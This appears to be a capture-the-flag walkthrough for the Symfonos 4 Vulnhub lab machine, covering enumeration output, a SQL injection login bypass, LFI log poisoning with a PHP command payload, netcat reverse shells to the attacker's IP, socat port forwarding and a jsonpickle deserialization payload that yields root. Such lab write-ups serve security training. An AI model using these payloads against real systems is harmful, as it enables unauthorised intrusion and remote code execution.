Symfonos 4
Symfonos 4 Vulnhub Walkthrough
Enumeration
nmap
nmap -sC -sV oA nmap/sym4 192.168.1.136
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 23:43 EDT
Nmap scan report for 192.168.1.136
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)
| 256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)
|_ 256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:DA:3F:AA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.27 seconds
As usual port 80 is open and we can put our IP at the web browser

Let's put to dirb
Dirb
dirb http://192.168.1.136
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 27 00:05:13 2020
URL_BASE: http://192.168.1.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.136/ ----
==> DIRECTORY: http://192.168.1.136/css/
+ http://192.168.1.136/index.html (CODE:200|SIZE:201)
==> DIRECTORY: http://192.168.1.136/javascript/
==> DIRECTORY: http://192.168.1.136/js/
==> DIRECTORY: http://192.168.1.136/manual/
+ http://192.168.1.136/robots.txt (CODE:403|SIZE:298)
+ http://192.168.1.136/server-status (CODE:403|SIZE:301)
We can see there is a /robots.txt

We don't have permission to access this file, so I use nikto
to enumerate
Nikto
nikto -h http://192.168.1.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.136
+ Target Hostname: 192.168.1.136
+ Target Port: 80
+ Start Time: 2020-05-27 00:17:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/atlantis.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: c9, size: 59058b74c9871, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-05-27 00:18:10 (GMT-4) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We can see that there is /atlantis.php
inside the robots.txt

Saw a login form, all I can think of is SQL injection.
After some tries, I can bypass the login form using this command at the username form
admin' or '1'='1'#

I can't seem to find anything. I even tried the LFI to ../../../../../../etc/passwd
but does not work. So I went to more enumeration.
Gobuster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.1.136 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.136
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/05/27 00:36:55 Starting gobuster
===============================================================
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/sea.php (Status: 302)
/atlantis.php (Status: 200)
/server-status (Status: 403)
/gods (Status: 301)
===============================================================
2020/05/27 00:41:53 Finished
===============================================================
Ah, we can see that there is a /gods

This is where the log file is stored. But then I realize this is the log file, then it seems like we can do ../../../../../../var/log/auth.
But if we do in the proper way, things will be like this
Exploitation
Wfuzz
We will use Wfuzz.
First, we need to use burp to intercept to get the PHPSESSID

Then, I use
wfuzz -c -b 'PHPSESSID=6mlbncfhcq8vhshrb4iqc5ev1r' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://192.168.1.106/sea.php?file=FUZZ
But first I didn't get the thing I wanted, soon, I check the wordlists and surprisingly the file does not include ../../../../../../../var/log/auth
.

So I add in myself, then we can run the command again

We need to hide the word that have the length of 39
wfuzz -c -b 'PHPSESSID=6mlbncfhcq8vhshrb4iqc5ev1r' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hw 39 http://192.168.1.106/sea.php?file=FUZZ
Run it again then we got this


We can see the log file now, then we can actually poison the LFI
ssh '<? php system($_GET['cmd']) ?>'@192.168.1.106

Then we can go to end of the URL and add &c=id;whoami;

We can now get the reverse shell from it
Our machine
nc -nlvp 4444
At the end of the URL
c=nc -e /bin/bash 192.168.1.116 4444

We got a shell !
Then we can type
python -c 'import pty; pty.spawn("/bin/bash")'
After some digging we can use
ss -l
to get what port is running on the machine

As we can see there is another port that is running.
Port Forward
We can port forward the port to get access it, since this only can locally port forward so we need to use socat
.
socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.0.1:8080 &
Then we can access it with port 8888

Then click the Main page

Since it mentioned about cookie, let's check for cookie

We can decode the password with this website and we got this

After some researching, it is a jsonpickle exploit. We can read these 3 website

to get an idea how it works
The code looks like this
{"py/reduce": "__main__.Shell", "py/reduce": [{"py/function": "os.system"},["nc -e /bin/bash 192.168.1.116 9000"],0,0,0]}
Then we can encode using base64 and put it at the cookies and get a reverse shell
Remember to set up a listener at our machine first
And then refresh the page, we got root !

Navigate to /root
and get the flag.txt

Congratulation!
Last updated
Was this helpful?